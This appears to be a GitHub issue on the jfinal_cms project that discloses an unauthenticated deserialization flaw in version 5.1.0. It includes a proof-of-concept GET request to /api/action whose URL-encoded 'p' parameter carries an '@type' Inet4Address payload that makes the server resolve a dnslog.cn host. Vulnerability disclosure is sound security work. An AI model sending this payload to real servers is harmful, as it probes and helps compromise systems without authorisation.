jflyfox / jfinal_cms

jfinal cms是一个java开发的功能强大的信息咨询网站,采用了简洁强大的JFinal作为web框架,模板引擎用的是beetl,数据库用mysql,前端bootstrap框架。支持oauth2认证、帐号注册、密码加密、评论及回复,消息提示,网站访问量统计,文章评论数和浏览量统计,回复管理,支持权限管理。后台模块包含:栏目管理,栏目公告,栏目滚动图片,文章管理,回复管理,意见反馈,我的相册,相册管理,图片管理,专辑管理、视频管理、缓存更新,友情链接,访问统计,联系人管理,模板管理,组织机构管理,用户管理,角色管理,菜单管理,数据字典管理。
http://mtg.jflyfox.com/
Apache License 2.0
628 stars 285 forks source link

jfinal CMS v5.1.0 has an unauthorization command execution vulnerability #60

Open kaoniniang2 opened 4 weeks ago

kaoniniang2 commented 4 weeks ago

jfinal_cms version:5.1.0 JDK version : jdk-8u351

Vulnerability file ApiForm.java image

The p parameter is passed in from the outside through the interface, and the parameters can be controlled, resulting in serialization.

POC: p parameter content, URL encoding is required{"zeo":{"@type":"java.net.Inet4Address","val":"aporo8.dnslog.cn"}}

GET /api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1&method=pageArticleSite&time=20170314160401&p=%7b%22%7a%65%6f%22%3a%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%61%70%6f%72%6f%38%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%7d image image

ElevenKong commented 4 weeks ago

您好,您的来信我已收到!谢谢! Best  Wishes!                                 ——孔祥亮